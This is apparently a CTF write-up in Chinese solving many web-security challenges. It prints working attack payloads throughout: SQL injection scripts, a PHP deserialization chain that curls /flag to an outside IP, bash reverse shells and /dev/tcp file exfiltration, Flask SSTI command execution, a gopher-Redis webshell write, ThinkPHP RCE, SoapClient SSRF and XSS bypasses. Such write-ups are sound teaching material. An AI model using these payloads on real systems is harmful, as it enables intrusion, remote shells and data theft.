Dark
看到url:http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/
发现后缀为.onion,为洋葱,下载后使用洋葱游览器访问
Welcome2021
查看源码发现
那么抓包使用WELCOME请求方式访问
访问f1111aaaggg9.php
得到flag
babysql
简单的sql注入,直接使用sqlmap即可,也可以联合注入
1' union select 1,2,3,4#
发现注入点为1,2
直接获取数据库
-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4#
发现数据库flag,那么读取一下表
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='flag'),3,4#
得到表fllag,那么读一下列
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='flag' and table_name='fllag'),3,4#
最后读取即可:
-1' union select 1,(select group_concat(fllllllag,wlz) from flag.fllag),3,4#
anothersql
发现回显都是
很明显的布尔盲注,过滤了:
mid,substr 可以用left或right绕过
<,> 用=
if 用case when绕过
然后写出脚本,得到flag
import requests
import string
url = "http://47.100.242.70:4003/check.php"
flag = ''
string= '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,@{}'
for x in range(1, 100):
for i in string:
#true
#payload = "1' or case when (left((database()),%d)='%s') then 1 else 0 end#" % (x, flag + i)
#syclover
#payload = "1' or case when (left((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d)='%s') then 1 else 0 end#" % (x, flag + i)
#id,uname,pwd,flag
#payload = "1' or case when (left((select group_concat(column_name) from information_schema.columns where table_name='syclover'),%d)='%s') then 1 else 0 end#" % (x, flag + i)
payload = "1' or case when (left((select flag from syclover),%d)='%s') then 1 else 0 end#" % (x, flag + i)
data = {'uname':payload,
'pwd':'123456',
'wp-submit':'登录'
}
#print(payload)
response = requests.post(url, data=data)
if b'your uname:admin adn your pwd:123456' in response.content:
flag += i
print(flag)
break
babyPOP
简单的pop链,给出来源码
<?php
class a {
public static $Do_u_like_JiaRan = false;
public static $Do_u_like_AFKL = false;
}
class b {
private $i_want_2_listen_2_MaoZhongDu;
public function __toString()
{
if (a::$Do_u_like_AFKL) {
return exec($this->i_want_2_listen_2_MaoZhongDu);
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}
class c {
public function __wakeup()
{
a::$Do_u_like_JiaRan = true;
}
}
class d {
public function __invoke()
{
a::$Do_u_like_AFKL = true;
return "关注嘉然," . $this->value;
}
}
class e {
public function __destruct()
{
if (a::$Do_u_like_JiaRan) {
($this->afkl)();
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}
if (isset($_GET['data'])) {
unserialize(base64_decode($_GET['data']));
} else {
highlight_file(__FILE__);
}
发现最后调用到类b的exec,那么就需要调用__toString()
->需要返回一个字符串,看到类d,发现__invoke
->需要使用调用函数的方式调用一个对象,看到类e,那么就需要将Do_u_like_AFKL
变为true->调用类c
但从类c到类e的过程中没有桥梁,我们需要自定义一个变量来完成,然后将这个变量的对象指向类e
<?php
class a {
public static $Do_u_like_JiaRan = false;
public static $Do_u_like_AFKL = false;
}
class b {
private $i_want_2_listen_2_MaoZhongDu = 'curl 110.42.134.160:6666/`cat /flag|base64`';
public function __toString()
{
if (a::$Do_u_like_AFKL) {
return exec($this->i_want_2_listen_2_MaoZhongDu);
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}
class c {
public $a;
public function __construct()
{
$this->a = new e();
}
public function __wakeup()
{
a::$Do_u_like_JiaRan = true;
}
}
class d {
public function __invoke()
{
a::$Do_u_like_AFKL = true;
return "关注嘉然," . $this->value;
}
}
class e {
public function __destruct()
{
if (a::$Do_u_like_JiaRan) {
($this->afkl)();
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}
$n = new c();
$n->a->afkl = new d();
$n->a->afkl->value = new b();
$m = serialize($n);
var_dump($m);
echo(base64_encode($m));
由于exec没有回显,又不存在权限创建文件,需要我们使用dnslog外带命令了:
curl 110.42.134.160:6666/`cat /flag|base64`
解码得到flag
where_is_my_FUMO
给出了文章:Linux 反弹shell(二)反弹shell的本质
给出了源码:
<?php
function chijou_kega_no_junnka($str) {
$black_list = [">", ";", "|", "{", "}", "/", " "];
return str_replace($black_list, "", $str);
}
if (isset($_GET['DATA'])) {
$data = $_GET['DATA'];
$addr = chijou_kega_no_junnka($data['ADDR']);
$port = chijou_kega_no_junnka($data['PORT']);
exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
highlight_file(__FILE__);
}
一开始尝试绕过,无果,后来测试了好久才发现可以连上去之后反弹shell,属实sb了
然后监听端口,反弹shell
bash -i >& /dev/tcp/110.42.134.160/2333 0>&1
最后需要下载flag.png到服务器,这里就需要文章中的内容了
cat flag.png > /dev/tcp/110.42.134.160/6666
然后监听端口输出到文件中,nc -lvnp 6666 > flag.png
得到flag
babyphp
右键查看源码得到提示robots.txt
访问得到源码:
<?php
function ssrf_me($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
}
if(isset($_GET['url'])){
ssrf_me($_GET['url']);
}
else{
highlight_file(__FILE__);
echo "<!-- 有没有一种可能,flag在根目录 -->";
}
简单的ssrf,直接file:///flag
babyPy
提示是flask ssti,那直接掏出payload
#文件读取
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/flag','r').read() }}{% endif %}{% endfor %}
#命令执行
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
蜜雪冰城甜蜜蜜
发现需要点出第九号饮料,并且看到js
/*
* 生成签名
* @params 待签名的json数据
* @secret 密钥字符串
*/
function makeSign(params, secret){
var ksort = Object.keys(params).sort();
var str = '';
for(var ki in ksort){
str += ksort[ki] + '=' + params[ksort[ki]] + '&';
}
str += 'secret=' + secret;
var token = hex_md5(str).toUpperCase();
return rsa_sign(token);
}
/*
* rsa加密token
*/
function rsa_sign(token){
var pubkey='-----BEGIN PUBLIC KEY-----';
pubkey+='MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAbfx4VggVVpcfCjzQ+nEiJ2DL';
pubkey+='nRg3e2QdDf/m/qMvtqXi4xhwvbpHfaX46CzQznU8l9NJtF28pTSZSKnE/791MJfV';
pubkey+='nucVcJcxRAEcpPprb8X3hfdxKEEYjOPAuVseewmO5cM+x7zi9FWbZ89uOp5sxjMn';
pubkey+='lVjDaIczKTRx+7vn2wIDAQAB';
pubkey+='-----END PUBLIC KEY-----';
// 利用公钥加密
var encrypt = new JSEncrypt();
encrypt.setPublicKey(pubkey);
return encrypt.encrypt(token);
}
/*
* 获取时间戳
*/
function get_time(){
var d = new Date();
var time = d.getTime()/1000;
return parseInt(time);
}
//secret密钥
var secret = 'e10adc3949ba59abbe56e057f20f883e';
$("[href='#']").click(function(){
var params = {};
console.log(123);
params.id = $(this).attr("id");
params.timestamp = get_time();
params.fake_flag= 'SYC{lingze_find_a_girlfriend}';
params.sign = makeSign(params, secret);
$.ajax({
url : "http://106.55.154.252:8083/sign.php",
data : params,
type:'post',
success:function(msg){
$('#text').html(msg);
alert(msg);
},
async:false
});
})
直接新命名一个id为9的即可,放入控制台运行即可
var flag = {};
flag.id = 9;
flag.timestamp = get_time();
flag.fake_flag= 'SYC{lingze_find_a_girlfriend}';
flag.sign = makeSign(flag, secret);
$.ajax({
url : "http://106.55.154.252:8083/sign.php",
data : flag,
type:'post',
success:function(msg){
$('#text').html(msg);
alert(msg);
},
async:false
});
雷克雅未克
需要修改XFF头为5.23.95.255,这里推荐一个工具
然后发现需要经纬度需要一样,在存储(cookie)那里加上x和y即可,64.963943,-19.02116
为jsfuck,最后控制台运行得到flag
人民艺术家
随便登录发现
那么使用他给的账号密码登录吧,发现请求头多了JWT
拿去解密发现为HS256加密
需要知道密钥,那么盲猜弱密码,使用c-jwt-cracker进行爆破
得到密钥1234,那么修改好数据重新访问
这里我使用postman进行访问,也可以抓包增加JWT头进行访问
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lIjoiMjAxOSIsIm5hbWUiOiJhZG1pbiJ9.WInN2vLaV6NMMsfu-6-foUOZ8trV9Ll2RsZ_gGd8Idk
访问得到flag
babyxss
<script>
function check(input){input = input.replace(/alert/,'');return '<script>console.log("'+input+'");</script>';}
</script>
发现存在过滤字符alert
,会将字符置空,那么直接双写绕过,还有绕过技巧:
</script><script>alalertert(1)</script>
</script><svg/onload=setTimeout('ale'+'rt(1)',0)>
</script><script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
Baby_PHP_Black_Magic_Enlightenment
给出了源码:
<?php
echo "PHP is the best Language <br/>";
echo "Have you ever heard about PHP Black Magic<br/>";
error_reporting(0);
$temp = $_GET['password'];
is_numeric($temp)?die("no way"):NULL;
if($temp>9999){
echo file_get_contents('./2.php');
echo "How's that possible";
}
highlight_file(__FILE__);
//Art is long, but life is short. So I use PHP.
//I think It`s So useful that DiaoRen Said;
//why not they use their vps !!!
//BBTZ le jiarenmen
?>
发现判断is_numeric($temp)
和$temp>9999
,要是temp不是数字但是大于9999,很明显弱比较
?password=10000a
得到baby_magic.php,进入下一关
<?php
error_reporting(0);
$flag=getenv('flag');
if (isset($_GET['user']) and isset($_GET['pass']))
{
if ($_GET['user'] == $_GET['pass'])
echo 'no no no no way for you to do so.';
else if (sha1($_GET['user']) === sha1($_GET['pass']))
die('G1ve u the flag'.$flag);
else
echo 'not right';
}
else
echo 'Just g1ve it a try.';
highlight_file(__FILE__);
?>
很明显sha1的数组绕过,直接传入数组就可以了?user[]=1&pass[]=2
baby_revenge.php,进入下一关发现:
<?php
error_reporting(0);
$flag=getenv('fllag');
if (isset($_GET['user']) and isset($_GET['pass']))
{
if ($_GET['user'] == $_GET['pass'])
echo 'no no no no way for you to do so.';
else if(is_array($_GET['user']) || is_array($_GET['pass']))
die('There is no way you can sneak me, young man!');
else if (sha1($_GET['user']) === sha1($_GET['pass'])){
echo "Hanzo:It is impossible only the tribe of Shimada can controle the dragon<br/>";
die('Genji:We will see again Hanzo'.$flag.'<br/>');
}
else
echo 'Wrong!';
}else
echo 'Just G1ve it a try.';
highlight_file(__FILE__);
?>
过滤了数组,那么需要sha1碰撞了,正好有一篇文章:关于SHA1碰撞——比较两个binary的不同之处
?user=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&pass=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
得到here_s_the_flag.php,最后一关
<?php
$flag=getenv('flllllllllag');
if(strstr("Longlone",$_GET['id'])) {
echo("no no no!<br>");
exit();
}
$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] === "Longlone")
{
echo "flag: $flag";
}
highlight_file(__FILE__);
?>
由于urldecode会解码一次,GET传参会解码一次,那么将Longlone
url编码两次就可以绕过了
?id=%254c%256f%256e%2567%256c%256f%256e%2565
givemeyourlove
手把手带你用 SSRF 打穿内网
访问发现,并且给出了一串数字123123
<?php
// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_match("/^https|dict|file:/is",$url))
{
echo 'NO NO HACKING!!';
die();
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>
题目提示redis,那么肯定是ssrf打redis了,由于存在密码,使用gopher-redis-auth
由于是GET传参,将生成的payload url编码一次得到:
gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25246%250D%250A123123%250D%250A%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
传入发现成功写入shell,最后读取flag即可
SoEzUnser
<?php
class fxxk{
public $par0;
public $par1;
public $par2;
public $par3;
public $kelasi;
public function __construct($par0,$par1,$par2,$par3){
$this -> par0 = $par0;
$this -> par1 = $par1;
$this -> par2 = $par2;
$this -> par3 = $par3;
}
public function newOne(){
$this -> kelasi = new $this -> par0($this -> par1,$this -> par2);
}
public function wuhu(){
echo('syclover !'.$this -> kelasi.' yyds');
}
public function qifei(){
//$ser = serialize($this -> kelasi);
//$unser = unserialize($ser);
$this -> kelasi -> juts_a_function();
}
public function __destruct(){
if(!empty($this -> par0) && (isset($this -> par1) || isset($this -> par2))){
$this -> newOne();
if($this -> par3 == 'unser'){
$this -> qifei();
}
else{
$this -> wuhu();
}
}
}
public function __wakeup(){
@include_once($this -> par2.'hint.php');
}
}
highlight_file(__FILE__);
$hack = $_GET['hack'];
unserialize($hack);
调用了之前学过的原生态一起出的一个题,参考文章:PHP 原生类的利用小结
首先先读取一下hint.php:
$a= new fxxk();
$a->par2 = 'php://filter/convert.base64-encode/resource=';
$b = serialize($a);
echo(urlencode($b));
使用GlobIterator类读取一下目录文件
$a= new fxxk();
$a->par0 = 'GlobIterator';
$a->par1 = 'glob://*';
$b = serialize($a);
echo(urlencode($b));
?hack=O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A12%3A"GlobIterator"%3Bs%3A4%3A"par1"%3Bs%3A8%3A"glob%3A%2F%2F*"%3Bs%3A4%3A"par2"%3BN%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}
得到目录aaaaaaaaaaafxadwagaefae
接着往下翻发现
$a= new fxxk();
$a->par0 = 'GlobIterator';
$a->par1 = 'glob://aaaaaaaaaaafxadwagaefae/*';
$b = serialize($a);
echo(urlencode($b));
?hack=O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A12%3A"GlobIterator"%3Bs%3A4%3A"par1"%3Bs%3A32%3A"glob%3A%2F%2Faaaaaaaaaaafxadwagaefae%2F*"%3Bs%3A4%3A"par2"%3BN%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}
非预期
那么需要使用SplFileObject读取了,这里可以使用php伪协议进行base64加密
$a= new fxxk();
$a->par0 = 'SplFileObject';
$a->par1 = 'php://filter/convert.base64-encode/resource=aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$a->par2 = 'rb';
$b = serialize($a);
echo(urlencode($b));
O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A13%3A"SplFileObject"%3Bs%3A4%3A"par1"%3Bs%3A82%3A"php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Daaaaaaaaaaafxadwagaefae%2FUcantGuess.php"%3Bs%3A4%3A"par2"%3Bs%3A2%3A"rb"%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}
直接可以获取源码了,得到flag
这里其实是非预期解出来的,实际上需要使用SoapClient
预期
根据提示,需要post传参:message=iwantflag&url=vps
,然后必须从内网的127.0.0.1发送,很明显使用ssrf
使用SoapClient类,然后触发__call,调用ssrf来让127.0.0.1发送请求包,最后vps接收flag
$a= new fxxk();
$target = 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$post_data = 'message=iwantflag&url=http://110.42.134.160:8080';
$a->par0 = 'SoapClient';
$a->par1 = null;
$a->par2 = array('location' => $target,'user_agent'=>'bmth^^X-Forwarded-For:127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '. (string)strlen($post_data).'^^^^'.$post_data,'uri'=>'http://127.0.0.1');
$a->par3 = 'unser';
$b = serialize($a);
$b = str_replace('^^',"\r\n",$b);
echo(urlencode($b));
O%3A4%3A%22fxxk%22%3A5%3A%7Bs%3A4%3A%22par0%22%3Bs%3A10%3A%22SoapClient%22%3Bs%3A4%3A%22par1%22%3BN%3Bs%3A4%3A%22par2%22%3Ba%3A3%3A%7Bs%3A8%3A%22location%22%3Bs%3A67%3A%22http%3A%2F%2F127.0.0.1%2Funserbucket%2Faaaaaaaaaaafxadwagaefae%2FUcantGuess.php%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A152%3A%22bmth%0D%0AX-Forwarded-For%3A127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+48%0D%0A%0D%0Amessage%3Diwantflag%26url%3Dhttp%3A%2F%2F110.42.134.160%3A8080%22%3Bs%3A3%3A%22uri%22%3Bs%3A16%3A%22http%3A%2F%2F127.0.0.1%22%3B%7Ds%3A4%3A%22par3%22%3Bs%3A5%3A%22unser%22%3Bs%3A6%3A%22kelasi%22%3BN%3B%7D
成全
发现是thinkphp5,直接使用payload试一下:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
发现存在disable_functions,过滤了所有的可执行命令的函数,尝试写文件发现当前目录无法写,尝试/tmp目录下
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=/tmp/shell.php&vars[1][]=<?php @eval($_POST[0]);?>
最后通过包含来连接蚁剑
?s=index/\think\Config/load&file=../../../../tmp/shell.php
得到flag
没做出来的题目
期末不挂科就算成功
查看源码发现一个debug.php,访问
发现是php伪协议,/debug.php?file=php://filter/convert.base64-encode/resource=debug.php
,读取一下
debug.php:
<?php
echo "<h1>快去学习PHP伪协议</h1>";
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "NO!!!";
exit();
}
include($file);
?>
index.php:
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch);
curl_close($ch);
//你当前位于学校172.17.0.0/24网段下 其实还有台机子里面可以修改成绩 我偷偷告诉你password是123456,name是admin,//result必须要改成60 不然学校会查的!!!
?>
发现是ssrf,爆破一下,发现内网为http://172.17.0.7/
noobPHP
给出了www.zip
,审计一下,看到AdminController.php:
我们要使roles中有ROLE_ADMIN
,但注册的时候roles只是为ROLE_USER
,那么就需要创建
看到UserController.php:
发现传入数组的代码过滤的不一样,肯定有问题,分析发现
array_unshift($get_roles, 'ROLE_USER');
那么我们传入?r[0]=ROLE_SUPERADMIN&r[1]=ROLE_ADMIN
变为:
然后进行
unset($get_roles[$i]);
$get_roles=array_values($get_roles);
看到当i=1
的时候会unset掉我们传入的ROLE_SUPERADMIN,然后被返回的数组将使用数值键,从0开始且以1递增,下一个就直接是i=2了,直接绕过了ROLE_ADMIN
接下来就是
if (preg_match("/[a-zA-Z]|\!|\@|\#|\%|\^|\&|\*|\:|\||\'\"|\`|\~|\\|\||\[|]/",$code)) {
new Response('Wow,not this🤡');die();
}
eval($code);
发现过滤了字母、取反、异或、单双引号、中括号等,但发现没有过滤数字、小括号、分号和加号,以前看过RCTF的数字getshell:https://nop-sw.github.io/wiki/wp/RCTF/
1/0 返回 INF //0为除数
0/0 返回 NAN
那么自增,可以构造任意字符串
<?php
$a = '$_ = ((0/0).(0)){1};$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$____.=$__;$__=$_;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$_____($____(){0});'; //SYSTEM(GETALLHEADERS(){0})
echo(urlencode($a));
这里我上传npc,然后建立socks5代理,连接上172.20.0.4的3306端口,但发现读写的权限不够,不能udf提权,换一个思路
然后又发现172.20.0.1是宝塔的站,但没啥思路,80端口啥都没有,扫描端口发现存在8002,访问,发现为ThinkPHP V5.0.10
breakout
给出了源码
<?php
highlight_file(__FILE__);
// 这些奇怪的符号是什么呢?字符串之间还能异或的吗?
$a = $_POST['v'] ^ '!-__)^';
// ctf常见的验证码哦!纯数字呢
if (substr(md5($_POST['auth']),0,6) == "666666") {
$a($_POST['code']);
}
首先要和!-__)^
异或,那么尝试生成system
,运行下面代码之后找到一个字符串:rt,+l3
<?php
$a = '~!@#$%^&*()_+\|/?.,<>`-={}[]1234567890abcderfhijklmnopqrst';
for($i = 0;$i<strlen($a);$i++){
for($j = 0;$j<strlen($a);$j++){
if (ord($a[$i]^$a[$j])>64 && ord($a[$i]^$a[$j])<91){
echo $a[$i]. ' xor ' .$a[$j]. ' is ';
echo chr(ord($a[$i]^$a[$j])). ' ';
echo ord($a[$i]^$a[$j]);
echo "\n";
}elseif (ord($a[$i]^$a[$j])>96 && ord($a[$i]^$a[$j])<122){
echo $a[$i]. ' xor ' .$a[$j]. ' is ';
echo chr(ord($a[$i]^$a[$j])). ' ';
echo ' ' .ord($a[$i]^$a[$j]);
echo "\n";
}
}
}
然后提示全数字,并且md5前六位为666666,进行爆破
import hashlib
for i in range(1, 100000001):
s = hashlib.md5(str(i).encode("UTF-8")).hexdigest()[0:6]
if s == "666666":
print(i)
break
得到数字:3185471